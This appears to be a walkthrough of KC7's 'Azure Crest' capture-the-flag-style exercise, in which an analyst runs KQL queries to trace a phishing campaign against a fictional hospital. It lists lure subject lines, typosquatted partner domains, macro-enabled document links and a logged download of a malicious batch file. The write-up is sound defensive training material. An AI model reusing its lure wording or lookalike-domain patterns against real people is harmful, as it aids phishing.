Azure Crest

KC7's first "moderate" difficulty challenge. The player assumes the role of a security analyst tasked with detecting any intrusions against Azure Crest Hospital, a major healthcare provider with over 200 employees. Recently there have been cost-cutting measures and attempts at streamlining operations, including the use of a custom-made (!) Enterprise Resource Planning (ERP) system developed by the hospital's Database Administrator (!!), which centralizes all records and information on a single server (!!!).

The case comes with a training guide with additional backstory and context, along with basic KQL tips. Its most useful piece of information is the list of official partners: MedEquipPros (medequippros.org), Pharma Best (pharmabest.net), Health Records Systems (healthrecordsystems.tech), and Emergency Care Partners (emergencycarepartners.com).

Sections

Section 1 - KQL 101

I'll start by scoping out Azure Crest's size and employee distribution.

Employees
| count
Query Results
Count
250
Employees
| summarize count() by role
Query Results
role count_
Support Staff 66
Administrative Staff 61
Medical Staff 50
Resident Doctors 40
Interns 20
IT Staff 5
Head of Emergency Medicine 1
Chief Financial Officer 1
Chief Administrative Officer 1
IT Director 1
Chief Medical Officer 1
Database Administrator 1
Director of Nursing 1
Head of Surgery 1

There are 250 employees, most of them administrative or support staff, closely followed by medical staff and resident doctors. The hospital's IT department is very small: 5 IT staff, a single IT Director and a single Database Administrator.

Section 2 - Quarantine Quandary

There was an alert that a file got quarantined a few days ago; the filename contains the string "healthcare". I was told false positives are rather common, but better safe than sorry.

SecurityAlerts
| where description contains "healthcare"
Query Results
timestamp alert_type severity description indicators
2024-03-14 10:39:26.0000 HOST high A suspicious file was quarantined on host ZQHM-LAPTOP: New_Healthcare_Protocols.docm [{'hostname': 'ZQHM-LAPTOP', 'filename': 'New_Healthcare_Protocols.docm', 'sha256': '9195246412dc64c15e429887cac945bbde13c249d25dad01c7245219d1ac021a'}]
2024-03-25 16:41:08.0000 EMAIL med Employee milowe reported a suspicious email with the subject "[EXTERNAL] 👶 New! Revolutionary Pediatric Healthcare Strategies ✨" [{'username': 'milowe', 'subject': '[EXTERNAL] 👶 New! Revolutionary Pediatric Healthcare Strategies ✨'}]

There are two alerts: one for the quarantined file, and another for an email reported as suspicious by user milowe (Resident Doctor Michel Lowe). The quarantined file is named New_Healthcare_Protocols.docm and has the SHA-256 hash 9195246412dc64c15e429887cac945bbde13c249d25dad01c7245219d1ac021a (no hits on VirusTotal). I decide to investigate the email first: a file quarantined automatically by security software and an email reported as suspicious by a user could well be connected, for instance as parts of the same phishing campaign.

Email
| where subject =~ "[EXTERNAL] 👶 New! Revolutionary Pediatric Healthcare Strategies ✨"
Query Results
timestamp sender reply_to recipient subject verdict link
2024-03-06 11:49:48.0000 healthupdate@gmail.com healthupdate@gmail.com michael_frith@azurecresthospital.med [EXTERNAL] 👶 New! Revolutionary Pediatric Healthcare Strategies ✨ CLEAN https://medequipamateurs.org/modules/online/modules/Pediatric_Care_Update.docm
2024-03-06 11:49:48.0000 healthupdate@gmail.com healthupdate@gmail.com jerry_jones@azurecresthospital.med [EXTERNAL] 👶 New! Revolutionary Pediatric Healthcare Strategies ✨ CLEAN https://medequipamateurs.org/modules/online/modules/Pediatric_Care_Update.docm
2024-03-22 11:57:55.0000 medstaffinfo@hospitalcomm.org medstaffinfo@hospitalcomm.org susan_deloatch@azurecresthospital.med [EXTERNAL] 👶 New! Revolutionary Pediatric Healthcare Strategies ✨ CLEAN https://unhealthyrecordsystems.tech/published/published/images/modules/Pediatric_Care_Update.docm
2024-03-22 11:57:55.0000 medstaffinfo@hospitalcomm.org medstaffinfo@hospitalcomm.org archie_mireles@azurecresthospital.med [EXTERNAL] 👶 New! Revolutionary Pediatric Healthcare Strategies ✨ CLEAN https://unhealthyrecordsystems.tech/published/published/images/modules/Pediatric_Care_Update.docm
2024-03-22 11:57:55.0000 medstaffinfo@hospitalcomm.org medstaffinfo@hospitalcomm.org claire_nastasi@azurecresthospital.med [EXTERNAL] 👶 New! Revolutionary Pediatric Healthcare Strategies ✨ CLEAN https://unhealthyrecordsystems.tech/published/published/images/modules/Pediatric_Care_Update.docm
2024-03-25 15:47:08.0000 medstaffinfo@hospitalcomm.org medstaffinfo@hospitalcomm.org michael_bauer@azurecresthospital.med [EXTERNAL] 👶 New! Revolutionary Pediatric Healthcare Strategies ✨ CLEAN http://medequipamateurs.org/online/share/images/New_Healthcare_Protocols.docm
2024-03-25 15:47:08.0000 medstaffinfo@hospitalcomm.org medstaffinfo@hospitalcomm.org constance_eldredge@azurecresthospital.med [EXTERNAL] 👶 New! Revolutionary Pediatric Healthcare Strategies ✨ CLEAN http://medequipamateurs.org/online/share/images/New_Healthcare_Protocols.docm
2024-03-25 15:47:08.0000 medstaffinfo@hospitalcomm.org medstaffinfo@hospitalcomm.org michel_lowe@azurecresthospital.med [EXTERNAL] 👶 New! Revolutionary Pediatric Healthcare Strategies ✨ CLEAN http://medequipamateurs.org/online/share/images/New_Healthcare_Protocols.docm
2024-03-25 15:47:08.0000 medstaffinfo@hospitalcomm.org medstaffinfo@hospitalcomm.org bradley_park@azurecresthospital.med [EXTERNAL] 👶 New! Revolutionary Pediatric Healthcare Strategies ✨ CLEAN http://medequipamateurs.org/online/share/images/New_Healthcare_Protocols.docm

Immediately, there are a bunch of what are very clearly phishing emails: the links all lead to downloads of macro-enabled Microsoft Word documents (.docm), namely the quarantined New_Healthcare_Protocols.docm and Pediatric_Care_Update.docm, and the senders all come from suspicious domains, likely an attempt at typosquatting or impersonating trusted third parties. To get a better scope of the problem, I use:

let bad_emails =
Email
| where subject =~ "[EXTERNAL] 👶 New! Revolutionary Pediatric Healthcare Strategies ✨"
| distinct sender;
let bad_domains =
Email
| where sender in (bad_emails)
or reply_to in (bad_emails)
| distinct tostring(parse_url(link).Host);
Email
| where tostring(parse_url(link).Host) in (bad_domains)
//| distinct tostring(parse_url(link).Host)
Query Results
timestamp sender reply_to recipient subject verdict link
2024-03-01 11:50:43.0000 medstaffinfo@hospitalcomm.org healthupdate@gmail.com joseph_markland@azurecresthospital.med [EXTERNAL] FW: 👶 New! Revolutionary Pediatric Healthcare Strategies ✨ CLEAN http://unhealthyrecordsystems.tech/search/public/share/New_Healthcare_Protocols.docm
2024-03-01 11:50:43.0000 medstaffinfo@hospitalcomm.org healthupdate@gmail.com geneva_arthur@azurecresthospital.med [EXTERNAL] FW: 👶 New! Revolutionary Pediatric Healthcare Strategies ✨ CLEAN http://unhealthyrecordsystems.tech/search/public/share/New_Healthcare_Protocols.docm
2024-03-01 11:50:43.0000 medstaffinfo@hospitalcomm.org healthupdate@gmail.com elizabeth_harris@azurecresthospital.med [EXTERNAL] FW: 👶 New! Revolutionary Pediatric Healthcare Strategies ✨ CLEAN http://unhealthyrecordsystems.tech/search/public/share/New_Healthcare_Protocols.docm
2024-03-01 11:50:43.0000 medstaffinfo@hospitalcomm.org healthupdate@gmail.com melvin_hudgens@azurecresthospital.med [EXTERNAL] FW: 👶 New! Revolutionary Pediatric Healthcare Strategies ✨ CLEAN http://unhealthyrecordsystems.tech/search/public/share/New_Healthcare_Protocols.docm
2024-03-04 10:52:18.0000 healthupdate@gmail.com healthupdate@gmail.com roy_trenneman@azurecresthospital.med [EXTERNAL] 🩺 Vital Update: Groundbreaking Pediatric Care Advances 🚀 CLEAN http://unhealthyrecordsystems.tech/images/images/New_Healthcare_Protocols.docm
2024-03-04 10:52:18.0000 healthupdate@gmail.com healthupdate@gmail.com monte_baez@azurecresthospital.med [EXTERNAL] 🩺 Vital Update: Groundbreaking Pediatric Care Advances 🚀 CLEAN http://unhealthyrecordsystems.tech/images/images/New_Healthcare_Protocols.docm
2024-03-04 10:52:18.0000 healthupdate@gmail.com healthupdate@gmail.com edward_williamson@azurecresthospital.med [EXTERNAL] 🩺 Vital Update: Groundbreaking Pediatric Care Advances 🚀 CLEAN http://unhealthyrecordsystems.tech/images/images/New_Healthcare_Protocols.docm
2024-03-04 10:52:18.0000 healthupdate@gmail.com healthupdate@gmail.com claire_arce@azurecresthospital.med [EXTERNAL] 🩺 Vital Update: Groundbreaking Pediatric Care Advances 🚀 CLEAN http://unhealthyrecordsystems.tech/images/images/New_Healthcare_Protocols.docm
2024-03-04 10:52:18.0000 healthupdate@gmail.com healthupdate@gmail.com harry_barnes@azurecresthospital.med [EXTERNAL] 🩺 Vital Update: Groundbreaking Pediatric Care Advances 🚀 CLEAN http://unhealthyrecordsystems.tech/images/images/New_Healthcare_Protocols.docm
2024-03-05 16:07:35.0000 healthupdate@gmail.com medstaffinfo@hospitalcomm.org charlene_simpson@azurecresthospital.med [EXTERNAL] FW: [Alert!] Critical Pediatric Care Protocol Revamp 🌟 CLEAN https://unhealthyrecordsystems.tech/search/share/New_Healthcare_Protocols.docm
2024-03-05 16:07:35.0000 healthupdate@gmail.com medstaffinfo@hospitalcomm.org scott_horwath@azurecresthospital.med [EXTERNAL] FW: [Alert!] Critical Pediatric Care Protocol Revamp 🌟 CLEAN https://unhealthyrecordsystems.tech/search/share/New_Healthcare_Protocols.docm
2024-03-06 11:49:48.0000 healthupdate@gmail.com healthupdate@gmail.com michael_frith@azurecresthospital.med [EXTERNAL] 👶 New! Revolutionary Pediatric Healthcare Strategies ✨ CLEAN https://medequipamateurs.org/modules/online/modules/Pediatric_Care_Update.docm
2024-03-06 11:49:48.0000 healthupdate@gmail.com healthupdate@gmail.com jerry_jones@azurecresthospital.med [EXTERNAL] 👶 New! Revolutionary Pediatric Healthcare Strategies ✨ CLEAN https://medequipamateurs.org/modules/online/modules/Pediatric_Care_Update.docm
2024-03-07 15:17:33.0000 medstaffinfo@hospitalcomm.org medstaffinfo@hospitalcomm.org eunice_birks@azurecresthospital.med [EXTERNAL] RE: 🚑 Attention Required: Urgent Pediatric Health Procedure Update 🌈 CLEAN https://unhealthyrecordsystems.tech/search/published/New_Healthcare_Protocols.docm
2024-03-12 14:06:07.0000 healthupdate@gmail.com healthupdate@gmail.com jonathan_bueno@azurecresthospital.med [EXTERNAL] FW: 🔑 Exclusive Access: Innovative Pediatric Care Techniques Unveiled 🔍 CLEAN http://takeyatimecarepartners.com/files/public/New_Healthcare_Protocols.docm
2024-03-12 14:06:07.0000 healthupdate@gmail.com healthupdate@gmail.com maudie_frierson@azurecresthospital.med [EXTERNAL] FW: 🔑 Exclusive Access: Innovative Pediatric Care Techniques Unveiled 🔍 CLEAN http://takeyatimecarepartners.com/files/public/New_Healthcare_Protocols.docm
2024-03-12 14:06:07.0000 healthupdate@gmail.com healthupdate@gmail.com lillian_mcfarland@azurecresthospital.med [EXTERNAL] FW: 🔑 Exclusive Access: Innovative Pediatric Care Techniques Unveiled 🔍 CLEAN http://takeyatimecarepartners.com/files/public/New_Healthcare_Protocols.docm
2024-03-12 14:06:07.0000 healthupdate@gmail.com healthupdate@gmail.com michael_huberty@azurecresthospital.med [EXTERNAL] FW: 🔑 Exclusive Access: Innovative Pediatric Care Techniques Unveiled 🔍 CLEAN http://takeyatimecarepartners.com/files/public/New_Healthcare_Protocols.docm
2024-03-13 10:48:18.0000 healthupdate@gmail.com healthupdate@gmail.com gary_berger@azurecresthospital.med [EXTERNAL] [Alert!] Critical Pediatric Care Protocol Revamp 🌟 SUSPICIOUS http://takeyatimecarepartners.com/online/online/online/New_Healthcare_Protocols.docm
2024-03-14 10:27:39.0000 medstaffinfo@hospitalcomm.org healthupdate@gmail.com scott_thibault@azurecresthospital.med [EXTERNAL] FW: 🚑 Attention Required: Urgent Pediatric Health Procedure Update 🌈 CLEAN http://takeyatimecarepartners.com/images/images/files/New_Healthcare_Protocols.docm
2024-03-14 10:27:39.0000 medstaffinfo@hospitalcomm.org healthupdate@gmail.com jerry_jones@azurecresthospital.med [EXTERNAL] FW: 🚑 Attention Required: Urgent Pediatric Health Procedure Update 🌈 CLEAN http://takeyatimecarepartners.com/images/images/files/New_Healthcare_Protocols.docm
2024-03-15 11:32:43.0000 medstaffinfo@hospitalcomm.org medstaffinfo@hospitalcomm.org charles_roberge@azurecresthospital.med [EXTERNAL] RE: 👶 New! Revolutionary Pediatric Healthcare Strategies ✨ SUSPICIOUS https://takeyatimecarepartners.com/search/search/modules/Pediatric_Care_Update.docm
2024-03-15 11:32:43.0000 medstaffinfo@hospitalcomm.org medstaffinfo@hospitalcomm.org anita_hummel@azurecresthospital.med [EXTERNAL] RE: 👶 New! Revolutionary Pediatric Healthcare Strategies ✨ SUSPICIOUS https://takeyatimecarepartners.com/search/search/modules/Pediatric_Care_Update.docm
2024-03-18 10:25:33.0000 medstaffinfo@hospitalcomm.org healthupdate@gmail.com beatrice_hogg@azurecresthospital.med [EXTERNAL] 🩺 Vital Update: Groundbreaking Pediatric Care Advances 🚀 CLEAN https://unhealthyrecordsystems.tech/share/search/Pediatric_Care_Update.docm
2024-03-18 10:25:33.0000 medstaffinfo@hospitalcomm.org healthupdate@gmail.com john_walker@azurecresthospital.med [EXTERNAL] 🩺 Vital Update: Groundbreaking Pediatric Care Advances 🚀 CLEAN https://unhealthyrecordsystems.tech/share/search/Pediatric_Care_Update.docm
2024-03-20 11:52:12.0000 medstaffinfo@hospitalcomm.org medstaffinfo@hospitalcomm.org dean_aitken@azurecresthospital.med [EXTERNAL] FW: [Alert!] Critical Pediatric Care Protocol Revamp 🌟 CLEAN http://medequipamateurs.org/share/Pediatric_Care_Update.docm
2024-03-20 11:52:12.0000 medstaffinfo@hospitalcomm.org medstaffinfo@hospitalcomm.org dolores_rader@azurecresthospital.med [EXTERNAL] FW: [Alert!] Critical Pediatric Care Protocol Revamp 🌟 CLEAN http://medequipamateurs.org/share/Pediatric_Care_Update.docm
2024-03-20 11:52:12.0000 medstaffinfo@hospitalcomm.org medstaffinfo@hospitalcomm.org thomas_mccloskey@azurecresthospital.med [EXTERNAL] FW: [Alert!] Critical Pediatric Care Protocol Revamp 🌟 CLEAN http://medequipamateurs.org/share/Pediatric_Care_Update.docm
2024-03-20 11:52:12.0000 medstaffinfo@hospitalcomm.org medstaffinfo@hospitalcomm.org judy_tomlinson@azurecresthospital.med [EXTERNAL] FW: [Alert!] Critical Pediatric Care Protocol Revamp 🌟 CLEAN http://medequipamateurs.org/share/Pediatric_Care_Update.docm
2024-03-21 11:38:00.0000 healthupdate@gmail.com medstaffinfo@hospitalcomm.org sheldon_pella@azurecresthospital.med [EXTERNAL] [Urgent!] Mandatory Health Protocol Update 😱 CLEAN https://pharmasecondbest.net/search/Pediatric_Care_Update.docm
2024-03-22 11:57:55.0000 medstaffinfo@hospitalcomm.org medstaffinfo@hospitalcomm.org susan_deloatch@azurecresthospital.med [EXTERNAL] 👶 New! Revolutionary Pediatric Healthcare Strategies ✨ CLEAN https://unhealthyrecordsystems.tech/published/published/images/modules/Pediatric_Care_Update.docm
2024-03-22 11:57:55.0000 medstaffinfo@hospitalcomm.org medstaffinfo@hospitalcomm.org archie_mireles@azurecresthospital.med [EXTERNAL] 👶 New! Revolutionary Pediatric Healthcare Strategies ✨ CLEAN https://unhealthyrecordsystems.tech/published/published/images/modules/Pediatric_Care_Update.docm
2024-03-22 11:57:55.0000 medstaffinfo@hospitalcomm.org medstaffinfo@hospitalcomm.org claire_nastasi@azurecresthospital.med [EXTERNAL] 👶 New! Revolutionary Pediatric Healthcare Strategies ✨ CLEAN https://unhealthyrecordsystems.tech/published/published/images/modules/Pediatric_Care_Update.docm
2024-03-25 15:47:08.0000 medstaffinfo@hospitalcomm.org medstaffinfo@hospitalcomm.org michael_bauer@azurecresthospital.med [EXTERNAL] 👶 New! Revolutionary Pediatric Healthcare Strategies ✨ CLEAN http://medequipamateurs.org/online/share/images/New_Healthcare_Protocols.docm
2024-03-25 15:47:08.0000 medstaffinfo@hospitalcomm.org medstaffinfo@hospitalcomm.org constance_eldredge@azurecresthospital.med [EXTERNAL] 👶 New! Revolutionary Pediatric Healthcare Strategies ✨ CLEAN http://medequipamateurs.org/online/share/images/New_Healthcare_Protocols.docm
2024-03-25 15:47:08.0000 medstaffinfo@hospitalcomm.org medstaffinfo@hospitalcomm.org michel_lowe@azurecresthospital.med [EXTERNAL] 👶 New! Revolutionary Pediatric Healthcare Strategies ✨ CLEAN http://medequipamateurs.org/online/share/images/New_Healthcare_Protocols.docm
2024-03-25 15:47:08.0000 medstaffinfo@hospitalcomm.org medstaffinfo@hospitalcomm.org bradley_park@azurecresthospital.med [EXTERNAL] 👶 New! Revolutionary Pediatric Healthcare Strategies ✨ CLEAN http://medequipamateurs.org/online/share/images/New_Healthcare_Protocols.docm
2024-03-26 16:17:59.0000 medstaffinfo@hospitalcomm.org healthupdate@gmail.com brett_ho@azurecresthospital.med [EXTERNAL] [Alert!] Critical Pediatric Care Protocol Revamp 🌟 BLOCKED https://medequipamateurs.org/modules/files/Pediatric_Care_Update.docm
2024-03-27 15:12:25.0000 medstaffinfo@hospitalcomm.org medstaffinfo@hospitalcomm.org justin_flores@azurecresthospital.med [EXTERNAL] psst... Important Pediatric Care Procedure Changes 👀 SUSPICIOUS https://medequipamateurs.org/files/share/public/Pediatric_Care_Update.docm
2024-03-28 15:19:16.0000 healthupdate@gmail.com healthupdate@gmail.com carla_bledsoe@azurecresthospital.med [EXTERNAL] [Urgent!] Mandatory Health Protocol Update 😱 CLEAN https://unhealthyrecordsystems.tech/search/New_Healthcare_Protocols.docm
2024-03-28 15:19:16.0000 healthupdate@gmail.com healthupdate@gmail.com christina_tate@azurecresthospital.med [EXTERNAL] [Urgent!] Mandatory Health Protocol Update 😱 CLEAN https://unhealthyrecordsystems.tech/search/New_Healthcare_Protocols.docm

There are 41 emails containing these malicious domains; this and other queries so far reveal that the threat actors are using only two email addresses for this campaign: medstaffinfo@hospitalcomm.org and healthupdate@gmail.com. The domains in the links seem to be deliberately alluding to official Azure Crest partners, such as medequipamateurs.org being a reference to medequippros.org. As a whole:

  • The malicious domains are:
    • unhealthyrecordsystems.tech
    • medequipamateurs.org
    • takeyatimecarepartners.com
    • pharmasecondbest.net
  • The malicious email addresses are:
    • medstaffinfo@hospitalcomm.org
    • healthupdate@gmail.com
  • The subject lines are:
    • [EXTERNAL] 👶 New! Revolutionary Pediatric Healthcare Strategies ✨
    • [EXTERNAL] 🩺 Vital Update: Groundbreaking Pediatric Care Advances 🚀
    • [EXTERNAL] FW: [Alert!] Critical Pediatric Care Protocol Revamp 🌟
    • [EXTERNAL] FW: 🔑 Exclusive Access: Innovative Pediatric Care Techniques Unveiled 🔍
    • [EXTERNAL] FW: 👶 New! Revolutionary Pediatric Healthcare Strategies ✨
    • [EXTERNAL] [Urgent!] Mandatory Health Protocol Update 😱
    • [EXTERNAL] RE: 👶 New! Revolutionary Pediatric Healthcare Strategies ✨
    • [EXTERNAL] [Alert!] Critical Pediatric Care Protocol Revamp 🌟
    • [EXTERNAL] FW: 🚑 Attention Required: Urgent Pediatric Health Procedure Update 🌈
    • [EXTERNAL] RE: 🚑 Attention Required: Urgent Pediatric Health Procedure Update 🌈
    • [EXTERNAL] psst... Important Pediatric Care Procedure Changes 👀
  • The files in the download links are:
    • Pediatric_Care_Update.docm
    • New_Healthcare_Protocols.docm

I'll check these domains against PassiveDns to see if I can uncover any new domains and IP addresses.

let bad_emails =
Email
| where subject =~ "[EXTERNAL] 👶 New! Revolutionary Pediatric Healthcare Strategies ✨"
| distinct sender;
let bad_domains =
Email
| where sender in (bad_emails)
or reply_to in (bad_emails)
| distinct tostring(parse_url(link).Host);
Email
| where tostring(parse_url(link).Host) in (bad_domains)
| distinct tostring(parse_url(link).Host)
| lookup PassiveDns on $left.Host == $right.domain
| distinct ip
Query Results
ip
135.103.59.74
131.92.62.82
62.121.133.43
93.142.203.80
215.95.144.58
25.126.98.121
16.101.245.182
96.120.124.180
131.190.102.173
115.12.60.150

Further nested lookups to find domains or more IP addresses don't return anything else. As a reminder, the malicious domains that point to these IP addresses are: unhealthyrecordsystems.tech, medequipamateurs.org, takeyatimecarepartners.com, pharmasecondbest.net.

During the investigation, The Valdorian Times posted a breaking news report on doctors being unable to access the hospital's internal systems and voicing their displeasure to the press.

Section 3 - The Phisher's Net

Things got more complicated with the Valdorian Times' report. I keep investigating, pivoting to check how many of the targeted employees actually clicked on the links.

let bad_emails =
Email
| where subject =~ "[EXTERNAL] 👶 New! Revolutionary Pediatric Healthcare Strategies ✨"
| distinct sender;
let bad_domains =
Email
| where sender in (bad_emails)
or reply_to in (bad_emails)
| distinct tostring(parse_url(link).Host);
OutboundNetworkEvents
| where tostring(parse_url(url).Host) in (bad_domains)
Query Results
timestamp method src_ip user_agent url
2024-03-01 11:57:43.0000 GET 10.10.0.69 Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 10.0; WOW64; Trident/4.0) http://unhealthyrecordsystems.tech/search/public/share/New_Healthcare_Protocols.docm
2024-03-01 12:05:43.0000 GET 10.10.0.96 Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0 http://unhealthyrecordsystems.tech/search/public/share/New_Healthcare_Protocols.docm
2024-03-01 12:09:43.0000 GET 10.10.0.110 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 http://unhealthyrecordsystems.tech/search/public/share/New_Healthcare_Protocols.docm
2024-03-01 12:31:43.0000 GET 10.10.0.175 Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36 http://unhealthyrecordsystems.tech/search/public/share/New_Healthcare_Protocols.docm
2024-03-04 11:02:18.0000 GET 10.10.0.16 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36 http://unhealthyrecordsystems.tech/images/images/New_Healthcare_Protocols.docm
2024-03-04 11:14:18.0000 GET 10.10.0.106 Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko http://unhealthyrecordsystems.tech/images/images/New_Healthcare_Protocols.docm
2024-03-04 11:28:18.0000 GET 10.10.0.2 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0 http://unhealthyrecordsystems.tech/images/images/New_Healthcare_Protocols.docm
2024-03-04 11:33:18.0000 GET 10.10.0.35 Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.114 Safari/537.36 http://unhealthyrecordsystems.tech/images/images/New_Healthcare_Protocols.docm
2024-03-04 11:33:18.0000 GET 10.10.0.202 Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) http://unhealthyrecordsystems.tech/images/images/New_Healthcare_Protocols.docm
2024-03-05 16:51:35.0000 GET 10.10.0.34 Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) https://unhealthyrecordsystems.tech/search/share/New_Healthcare_Protocols.docm
2024-03-05 17:04:35.0000 GET 10.10.0.167 Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36 https://unhealthyrecordsystems.tech/search/share/New_Healthcare_Protocols.docm
2024-03-06 12:12:48.0000 GET 10.10.0.174 Mozilla/5.0 (Windows NT 5.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0 https://medequipamateurs.org/modules/online/modules/Pediatric_Care_Update.docm
2024-03-06 12:40:48.0000 GET 10.10.0.19 Mozilla/5.0 (Windows NT 5.1; WOW64; Trident/7.0; rv:11.0) like Gecko https://medequipamateurs.org/modules/online/modules/Pediatric_Care_Update.docm
2024-03-07 15:32:33.0000 GET 10.10.0.66 Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0 https://unhealthyrecordsystems.tech/search/published/New_Healthcare_Protocols.docm
2024-03-12 14:09:07.0000 GET 10.10.0.112 Mozilla/5.0 (Windows NT 6.1; rv:47.0) Gecko/20100101 Firefox/47.0 http://takeyatimecarepartners.com/files/public/New_Healthcare_Protocols.docm
2024-03-12 14:10:07.0000 GET 10.10.0.71 Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko http://takeyatimecarepartners.com/files/public/New_Healthcare_Protocols.docm
2024-03-12 14:38:07.0000 GET 10.10.0.154 Mozilla/5.0 (Windows NT 5.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0 http://takeyatimecarepartners.com/files/public/New_Healthcare_Protocols.docm
2024-03-13 11:32:18.0000 GET 10.10.0.229 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1; Win64; x64; Trident/5.0) http://takeyatimecarepartners.com/online/online/online/New_Healthcare_Protocols.docm
2024-03-14 10:37:39.0000 GET 10.10.0.174 Mozilla/5.0 (Windows NT 5.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0 http://takeyatimecarepartners.com/images/images/files/New_Healthcare_Protocols.docm
2024-03-14 10:37:39.0000 GET 10.10.0.183 Mozilla/5.0 (Windows NT 5.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0 http://takeyatimecarepartners.com/images/images/files/New_Healthcare_Protocols.docm
2024-03-15 12:20:43.0000 GET 10.10.0.166 Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.96 Safari/537.36 https://takeyatimecarepartners.com/search/search/modules/Pediatric_Care_Update.docm
2024-03-15 12:29:43.0000 GET 10.10.0.105 Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0 https://takeyatimecarepartners.com/search/search/modules/Pediatric_Care_Update.docm
2024-03-18 10:32:33.0000 GET 10.10.0.187 Mozilla/5.0 (Windows NT 5.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko https://unhealthyrecordsystems.tech/share/search/Pediatric_Care_Update.docm
2024-03-18 10:48:33.0000 GET 10.10.0.103 Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 10.0; WOW64; Trident/6.0) https://unhealthyrecordsystems.tech/share/search/Pediatric_Care_Update.docm
2024-03-20 12:07:12.0000 GET 10.10.0.86 Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0 http://medequipamateurs.org/share/Pediatric_Care_Update.docm
2024-03-20 12:10:12.0000 GET 10.10.0.170 Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0 http://medequipamateurs.org/share/Pediatric_Care_Update.docm
2024-03-20 12:17:12.0000 GET 10.10.0.46 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.120 Safari/537.36 http://medequipamateurs.org/share/Pediatric_Care_Update.docm
2024-03-20 12:45:12.0000 GET 10.10.0.54 Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0 http://medequipamateurs.org/share/Pediatric_Care_Update.docm
2024-03-21 11:51:00.0000 GET 10.10.0.133 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.3; WOW64; Trident/5.0) https://pharmasecondbest.net/search/Pediatric_Care_Update.docm
2024-03-22 12:18:55.0000 GET 10.10.0.78 Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0 https://unhealthyrecordsystems.tech/published/published/images/modules/Pediatric_Care_Update.docm
2024-03-22 12:22:55.0000 GET 10.10.0.117 Mozilla/5.0 (Windows NT 6.1; rv:50.0) Gecko/20100101 Firefox/50.0 https://unhealthyrecordsystems.tech/published/published/images/modules/Pediatric_Care_Update.docm
2024-03-22 12:29:55.0000 GET 10.10.0.224 Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.3; Trident/4.0) https://unhealthyrecordsystems.tech/published/published/images/modules/Pediatric_Care_Update.docm
2024-03-25 16:03:08.0000 GET 10.10.0.61 Mozilla/5.0 (Windows NT 5.1; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0 http://medequipamateurs.org/online/share/images/New_Healthcare_Protocols.docm
2024-03-25 16:26:08.0000 GET 10.10.0.221 Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) http://medequipamateurs.org/online/share/images/New_Healthcare_Protocols.docm
2024-03-25 16:37:08.0000 GET 10.10.0.31 Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.99 Safari/537.36 http://medequipamateurs.org/online/share/images/New_Healthcare_Protocols.docm
2024-03-27 15:13:25.0000 GET 10.10.0.63 Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0) https://medequipamateurs.org/files/share/public/Pediatric_Care_Update.docm
2024-03-28 15:43:16.0000 GET 10.10.0.157 Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36 https://unhealthyrecordsystems.tech/search/New_Healthcare_Protocols.docm
2024-03-28 16:13:16.0000 GET 10.10.0.108 Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.110 Safari/537.36 https://unhealthyrecordsystems.tech/search/New_Healthcare_Protocols.docm
2024-04-02 11:29:37.0000 GET 10.10.0.2 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0 https://medequipamateurs.org/UrTottalyPwned.bat

There are 39 events; using the distinct keyword shows that 37 distinct employees clicked the links and downloaded the malicious files. Notably, there is a new downloaded file: UrTottalyPwned.bat, downloaded from medequipamateurs.org by IP address 10.10.0.2; that same IP address had downloaded New_Healthcare_Protocols.docm 29 days earlier. The affected employees are:

let bad_emails =
Email
